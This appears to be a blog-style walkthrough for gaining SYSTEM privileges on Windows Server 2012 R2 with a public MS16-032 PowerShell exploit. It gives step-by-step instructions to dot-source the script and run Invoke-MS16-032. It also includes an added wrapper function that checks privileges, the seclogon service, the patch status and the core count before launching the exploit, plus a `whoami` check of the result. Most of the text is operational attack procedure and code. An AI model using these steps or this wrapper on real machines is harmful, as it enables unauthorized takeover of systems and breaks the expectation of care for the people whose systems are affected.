Privilege Escalation (EoP) on Windows Server 2012 via PowerShell (PS)

  1. Download the PowerShell script and save it as 39719.ps1.
  2. Open an unprivileged PowerShell console.
  3. Change to the folder where you saved the script.
  4. Dot-source the script: . .\39719.ps1
  5. Run Invoke-MS16-032.
  6. Wait for the race to complete: you now have a cmd.exe running as NT AUTHORITY\SYSTEM.
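The six steps above wrapped in a pre-flight check, as an added example that is not part of the original page or of FuzzySecurity's script. It assumes 39719.ps1 is in the current directory and exposes Invoke-MS16-032 as the steps say; the KB number used for the "already patched" check is an assumption to be confirmed against the MS16-032 bulletin before relying on it.

```powershell
# Added example, not code from the original page. Runs a few sanity checks
# before dot-sourcing 39719.ps1 and calling Invoke-MS16-032.

function Test-MS16032Preconditions {
    param([string]$PatchKB = 'KB3139914')   # assumed KB for MS16-032; verify against the bulletin

    $ok = $true

    # 1. Confirm we really are unprivileged; there is nothing to escalate otherwise.
    $id      = [Security.Principal.WindowsIdentity]::GetCurrent()
    $isAdmin = (New-Object Security.Principal.WindowsPrincipal $id).IsInRole(
                   [Security.Principal.WindowsBuiltInRole]::Administrator)
    Write-Host "[*] Running as $($id.Name); elevated: $isAdmin"

    # 2. The bug lives in the Secondary Logon service (seclogon), which is what
    #    CreateProcessWithLogonW talks to, so the service must be running.
    $svc = Get-Service -Name seclogon -ErrorAction SilentlyContinue
    if (-not $svc -or $svc.Status -ne 'Running') {
        Write-Host "[!] seclogon is not running (status: $($svc.Status)); the exploit cannot work"
        $ok = $false
    }

    # 3. If the fix is installed the handle leak is gone; do not bother running.
    if (Get-HotFix -Id $PatchKB -ErrorAction SilentlyContinue) {
        Write-Host "[!] $PatchKB is installed; host looks patched"
        $ok = $false
    }

    # 4. It is a race against seclogon; on a single core it rarely wins.
    if ([int]$env:NUMBER_OF_PROCESSORS -lt 2) {
        Write-Host "[!] Single-core host; the race is unlikely to succeed"
    }

    return $ok
}

if (Test-MS16032Preconditions) {
    . .\39719.ps1        # dot-source so Invoke-MS16-032 is defined in this scope
    Invoke-MS16-032      # on success a cmd.exe appears running as NT AUTHORITY\SYSTEM
}
```

To confirm the result from the new window, run `whoami` there; it should print `nt authority\system`.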

I tested it on Windows Server 2012 R2 Datacenter Edition 64-bit, but the author tested it on other Windows versions.

You can read more about:

Script info:

  • Author: Ruben Boonen (@FuzzySec)
  • Blog:
  • License: BSD 3-Clause
  • Required Dependencies: PowerShell v2+
  • Optional Dependencies: None